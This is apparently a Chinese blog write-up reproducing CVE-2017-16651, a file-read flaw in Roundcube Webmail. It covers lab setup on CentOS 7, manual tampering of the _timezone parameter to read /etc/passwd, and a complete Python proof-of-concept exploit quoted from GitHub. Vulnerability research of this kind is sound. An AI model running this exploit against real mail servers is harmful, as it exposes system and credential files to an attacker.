0%

(CVE-2017-16651)Roundcube Webmail文件读取漏洞

  1. 简介

    roundcubemail作为web端的邮件客户端。是一个基于浏览器,支持多国语言的IMAP客户端,它的操作界面看起像一个桌面应用程序。它提供一个email客户端应该具备的所有功能,包括MIME支持,地址薄,文件夹操作,信息搜索和拼写检查等。

  2. 影响版本

    • Versions: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
  3. 利用条件

    已知一个用户名密码

  4. 环境搭建

    cnetos7

1
2
3
4
5
6
7
8
9
10
#安装apache2
sudo yum install httpd
sudo yum install httpd-devel
#添加源
sudo yum install epel-release
sudo rpm -ivh http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
#列出php5.6并安装
sudo yum install --enablerepo=remi --enablerepo=remi-php56 php php-opcache php-devel php-mcrypt php-mysqlnd php-phpunit-PHPUnit php-pecl-xdebug php-pecl-xhprof php-mbstring --skip-broken
#查看php版本
php --version

在/var/www/html/目录新建测试页,启动apache,查看页面

1
2
3
4
5
6
7
8
9
#安装mysql57
sudo wget https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm
sudo yum -y localinstall mysql57-community-release-el7-11.noarch.rpm
sudo yum -y install mysql-community-server
#启动mysql并查看设置密码
systemctl start mysqld
sudo cat /var/log/mysqld.log | grep password
进入mysql设置密码
ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';

安装配置sendmail

1
2
3
4
sudo yum install m4 telnet mailx
sudo yum install sendmail sendmail-cf
m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
systemctl restart sendmail.service

Dovecot安装和配置

1
2
3
sudo yum install telnet mailx mutt
sudo yum install dovecot
sudo vim /etc/dovecot/dovecot.conf

1
2
3
4
sudo vim /etc/dovecot/conf.d/10-mail.conf
设置mail_location = mbox:~/mail:INBOX=/var/mail/%u
#启动dovecot
systemctl start dovecot.service

Roundcubemail安装和配置

下载roundcubemail-1.2.4-complete.tar.gz,解压到/var/www/html

时区需要设置

1
sudo vim /etc/php.ini

重启apache

mysql创建数据库填入roundcubemail,其余全默认,进行下一步点击Create config

将生成的config.inc.php文件放置在roundcubemail-1.2.4/config下

下一步

config.inc.php文件中配置数据库用户名密码

创建账户密码

1
2
3
sudo useradd user1
sudo passwd user1
gpasswd -a user1 mail

注意:远程登录关闭防火墙

使用user1/12345678进行登录

  1. 漏洞测试

登录、抓包,修改_timezone为如下(以读取/etc/passwd文件为例):

访问:http://192.168.254.7/roundcubemail-1.2.4/?_task=settings&_action=upload-display&_from=timezone&_file=rcmfile1

github上poc如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python3
# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1

import requests
import re
import sys

URL="https://127.0.0.1/"
USER="user@example.com"
PASS="password"

def main():
s = requests.Session()
r = s.get(URL,params={"_task":"login"},verify=False)
token = None
for line in r.text.split("\n"):
if 'name="_token"' in line:
token = line.split("value=")[1].split('"')[1]
print("[+] token: %s" % token)
if token is None:
print("[!] unable to retrieve token")
sys.exit(1)

data = {
"_token":token,
"_task":"login",
"_action":"login",
"_timezone[files][1][path]":sys.argv[1],
"_url":"_task%3Dlogin",
"_user":USER,
"_pass":PASS
}
r = s.post(URL,params={"_task":"login"},data=data,verify=False)

params = {
"_task":"settings",
"_action":"upload-display",
"_from":"timezone",
"_file":"rcmfile1"
}

r = s.get(URL,params=params,verify=False)
print(r.text)

if __name__ == "__main__":
if len(sys.argv) != 2:
print("[!] Usage: %s <file-to-read>" % sys.argv[0])
else:
main()
-------本文结束  感谢您的阅读-------